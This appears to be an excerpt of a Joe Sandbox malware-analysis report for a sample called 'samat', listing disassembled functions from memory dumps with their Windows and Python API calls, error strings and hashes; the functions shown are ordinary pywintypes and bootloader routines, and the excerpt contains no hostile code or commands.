                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_String
                                                                                                                                                                                                                                                                                      • String ID: %s not supported by this version of Windows$%s: adding ACE would put ACL over size limit$%s: unable to allocated %d bytes$The object is not a PySID object
                                                                                                                                                                                                                                                                                      • API String ID: 1450464846-1709335586
                                                                                                                                                                                                                                                                                      • Opcode ID: acd72d126dd04e3d366b3d57bba94e5d2814d11e261c2ab172a574c504a94f1b
                                                                                                                                                                                                                                                                                      • Instruction ID: b47f78c728c2ae03d3f1457e96e095ad1f90fab56e178f26dd031e3e601e72be
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: acd72d126dd04e3d366b3d57bba94e5d2814d11e261c2ab172a574c504a94f1b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE516E26B0CB4282FA149B9EA85003D63A5BF89FD4F944435EF4E47BB6EE3CE5458300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsValidSecurityDescriptor.ADVAPI32(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87960
                                                                                                                                                                                                                                                                                      • PyErr_SetString.PYTHON313(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8797B
                                                                                                                                                                                                                                                                                      • GetSecurityDescriptorLength.ADVAPI32(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87996
                                                                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E879A4
                                                                                                                                                                                                                                                                                      • MakeSelfRelativeSD.ADVAPI32(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E879BD
                                                                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E879CE
                                                                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E879DE
                                                                                                                                                                                                                                                                                      • PyErr_Format.PYTHON313(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87A02
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DescriptorErr_Securitymalloc$FormatLengthMakeRelativeSelfStringValidfree
                                                                                                                                                                                                                                                                                      • String ID: Invalid Security descriptor$MakeSelfRelativeSD$Unable to allocate %d bytes
                                                                                                                                                                                                                                                                                      • API String ID: 1101611553-2210018374
                                                                                                                                                                                                                                                                                      • Opcode ID: ac73de6e39ddeed083d98a8888cc15b10e7ce052d5d07b96d89372fbc4ae9b04
                                                                                                                                                                                                                                                                                      • Instruction ID: 0b1f43895be5e68762b5146c48bdb006752766505c2daf885cc998033ad57b80
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac73de6e39ddeed083d98a8888cc15b10e7ce052d5d07b96d89372fbc4ae9b04
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B31FB22B18B4182EB809BA9F85426D63A1FF89FC4F445131EB4E87769DF3DD8858700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_Formatmalloc
                                                                                                                                                                                                                                                                                      • String ID: Ace type %d is not supported yet$Error reordering ACL: Unable to allocate acl of size %d$ReorderACL
                                                                                                                                                                                                                                                                                      • API String ID: 1659041409-545600788
                                                                                                                                                                                                                                                                                      • Opcode ID: 80076816f9a1870518144f9e70f1a9ffdbb8e573a704e52155d4e8cf1921dfc3
                                                                                                                                                                                                                                                                                      • Instruction ID: d4337464b2e1e61a088f659f8995c6541445e442b19290d97dd67759186d4330
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80076816f9a1870518144f9e70f1a9ffdbb8e573a704e52155d4e8cf1921dfc3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38516F62A0879281F7608F6AA44037EA7A0FF85FC5F945039EF8D837A5DE3CE4458740
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DeallocErr_StringUnicode_
                                                                                                                                                                                                                                                                                      • String ID: Internal$InternalHigh$The object is not a PyHANDLE object$can't delete OVERLAPPED attributes$hEvent
                                                                                                                                                                                                                                                                                      • API String ID: 3427960318-2811562281
                                                                                                                                                                                                                                                                                      • Opcode ID: 6f9bae75d1a21e5200ff923e5a1191e3a43b0791db843c6bce82305bf55956a3
                                                                                                                                                                                                                                                                                      • Instruction ID: e63160ecd059982688483c53fc5323dab0ac780a98759d696d86bd6b8ba5e31c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f9bae75d1a21e5200ff923e5a1191e3a43b0791db843c6bce82305bf55956a3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5510962A08B4292FA649B6EE94027D63A0FF45FC4F944131DB4E477B6DF3DE5558300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_String$FormatUnicode_
                                                                                                                                                                                                                                                                                      • String ID: Expected 'bytes', got '%s'$None is not a valid string in this context$value is larger than a DWORD
                                                                                                                                                                                                                                                                                      • API String ID: 744494611-3495899980
                                                                                                                                                                                                                                                                                      • Opcode ID: 642d062dd71c2c3f8c7481d2541cfedb3f89497689dab01917ab17cc1366d4e1
                                                                                                                                                                                                                                                                                      • Instruction ID: 56305ebd00af590c72a229b8a0351df8459c51c62a1ba7e9a3853627f48a5ccb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 642d062dd71c2c3f8c7481d2541cfedb3f89497689dab01917ab17cc1366d4e1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7411A22A0DB4285EB518F5EE84427D63A0AF48FC4F594532EB0E87776EE3DE495C300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: String$Err_$FreeMem_$AllocCharFormatUnicode_Wide
                                                                                                                                                                                                                                                                                      • String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
                                                                                                                                                                                                                                                                                      • API String ID: 2830890580-4125661472
                                                                                                                                                                                                                                                                                      • Opcode ID: 2f2fd1bd077cf4d9f48c6f4d287ef1593a6289a2c9030374ace75b4ff9283679
                                                                                                                                                                                                                                                                                      • Instruction ID: 0902fab67f90cef7121c8d5c2e5de6e52658d1832a9ae3dff4232361c3604e44
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f2fd1bd077cf4d9f48c6f4d287ef1593a6289a2c9030374ace75b4ff9283679
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3031D626A08B42C2FB508B9AE44026D63A1FF88FD4F884531EB5E87779DF7CE4498701
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_Long$Occurred$DeallocLong_$ClearFormatNumber_Unsigned
                                                                                                                                                                                                                                                                                      • String ID: Unable to convert %s to pointer-sized value
                                                                                                                                                                                                                                                                                      • API String ID: 1465853305-2431006615
                                                                                                                                                                                                                                                                                      • Opcode ID: 57e26dbec32f2f369f39d670887e51803981aee692bf8c45d946dd112ecbf49d
                                                                                                                                                                                                                                                                                      • Instruction ID: 033caa45e474f44c5f8329c47735899dd1ebe8fb55385c69065f2793b12e4a1a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57e26dbec32f2f369f39d670887e51803981aee692bf8c45d946dd112ecbf49d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66211932E09B4291FB544FA9E85463C23A0AF4AFE5F485275EB2E423F5DE3CE4958300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: State_SwapThread$ErrorFatalFunc$AllocLocalValue
                                                                                                                                                                                                                                                                                      • String ID: Out of memory allocating thread state.$PyWinInterpreterState_Ensure$pywintypes: can not setup interpreter state, as current state is invalid
                                                                                                                                                                                                                                                                                      • API String ID: 4234957216-1490924957
                                                                                                                                                                                                                                                                                      • Opcode ID: ea76954ba2b931e15fda9edfbedd9c8b0e85c06434b3c3fd715313b2e18efd7a
                                                                                                                                                                                                                                                                                      • Instruction ID: d95e77a5ed6b6bf4c2aa5702d5d8552182f098e4018353089b971ee4e6dba31b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea76954ba2b931e15fda9edfbedd9c8b0e85c06434b3c3fd715313b2e18efd7a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22119236A09B07A6EB589B59E89826D33A0FF48FD5F840439D60E433B4EF3CE5588200
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                                                      • String ID: P%
                                                                                                                                                                                                                                                                                      • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                                                      • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                                      • Instruction ID: ebf4d3a0c32c6121c8b71d1092ddf96f1ad691fb6c2c108c588ef25df26c52e0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD5107266047A186D7259F26E8182BAF7A1F798B61F004122EBDE83694DF7CD045CB20
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32 ref: 00007FF8B7E8CACD
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32 ref: 00007FF8B7E8CAFF
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32 ref: 00007FF8B7E8CB32
                                                                                                                                                                                                                                                                                      • PyLong_FromUnsignedLong.PYTHON313 ref: 00007FF8B7E8CB6B
                                                                                                                                                                                                                                                                                      • PyLong_FromUnsignedLong.PYTHON313 ref: 00007FF8B7E8CB78
                                                                                                                                                                                                                                                                                      • PyLong_FromUnsignedLong.PYTHON313 ref: 00007FF8B7E8CB85
                                                                                                                                                                                                                                                                                      • PyLong_FromUnsignedLong.PYTHON313 ref: 00007FF8B7E8CB92
                                                                                                                                                                                                                                                                                      • Py_BuildValue.PYTHON313 ref: 00007FF8B7E8CBD0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8A400: PyObject_GetAttrString.PYTHON313(?,?,?,?,?,?,?,?,?,00007FF8B7E89C6D), ref: 00007FF8B7E8A444
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8A400: _Py_Dealloc.PYTHON313(?,?,?,?,?,?,?,?,?,00007FF8B7E89C6D), ref: 00007FF8B7E8A4A8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Time$FromLongLong_Unsigned$FileSystem$BuildValue$AttrDeallocDecodeErr_ErrorFormatFreeLastLocalMessageObjectObject_StringUnicode_
                                                                                                                                                                                                                                                                                      • String ID: FileTimeToSystemTime$lNNNNNNNuu
                                                                                                                                                                                                                                                                                      • API String ID: 3509019891-4021486075
                                                                                                                                                                                                                                                                                      • Opcode ID: e012cac86467e09425fc3eb86c788589e93cbae2027880d1750f8e61441089dd
                                                                                                                                                                                                                                                                                      • Instruction ID: 2b687677daba3507572f0b81dd81fd96e0f17765469ca5f01d263186396917f7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e012cac86467e09425fc3eb86c788589e93cbae2027880d1750f8e61441089dd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33411826A08B4192E650DB59F8446AE73A4FF89BC4F854132EA8D437B6DF3CE446C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: String$Err_$CharUnicode_Wide
                                                                                                                                                                                                                                                                                      • String ID: <NULL!!>$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
                                                                                                                                                                                                                                                                                      • API String ID: 3849944921-1275048830
                                                                                                                                                                                                                                                                                      • Opcode ID: b0e8982cd879d59a9668f92adfe5365474881f42431a1bc4517e5c5527a76195
                                                                                                                                                                                                                                                                                      • Instruction ID: 3afebe0c4db59599bcba6ae4648355924b2d8b4576130c93f88d694e3b355931
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0e8982cd879d59a9668f92adfe5365474881f42431a1bc4517e5c5527a76195
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1331E922A18B8281EB508B9EE48016D63B0FF89FC4F945532EB4D87775DE3CD4458700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                                                      • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                                                      • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                                                      • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                                                      • Instruction ID: b530895f767a068d39fbb523c3f6f018e60985dda97c1510cd40a1c70da1ae6b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE21AD21B0864381E7426B79EC563799294FF85B90F898133DF1D833D4DEBCD5808222
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
